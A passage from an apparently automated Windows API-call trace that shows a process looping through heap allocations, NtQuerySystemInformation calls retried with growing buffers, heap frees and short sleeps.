ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.752] Sleep (dwMilliseconds=0x110) [0193.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.803] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.804] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.805] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.805] Sleep (dwMilliseconds=0x110) [0193.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.816] Sleep (dwMilliseconds=0x110) [0193.825] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.825] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.826] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.833] Sleep (dwMilliseconds=0x110) [0193.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0193.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0193.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0193.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0193.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0193.863] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0193.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0193.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0193.878] Sleep (dwMilliseconds=0x110) [0194.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.194] Sleep (dwMilliseconds=0x110) [0194.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.334] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.335] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.336] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.336] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.343] Sleep (dwMilliseconds=0x110) [0194.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.357] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.366] Sleep (dwMilliseconds=0x110) [0194.402] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.403] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.408] Sleep (dwMilliseconds=0x110) [0194.460] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.460] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.461] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.465] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.465] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.471] Sleep (dwMilliseconds=0x110) [0194.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.492] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.492] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.493] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.493] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.493] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.494] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.494] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.494] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.495] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.495] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.495] Sleep (dwMilliseconds=0x110) [0194.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.521] Sleep (dwMilliseconds=0x110) [0194.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.537] Sleep (dwMilliseconds=0x110) [0194.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.553] Sleep (dwMilliseconds=0x110) [0194.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.566] 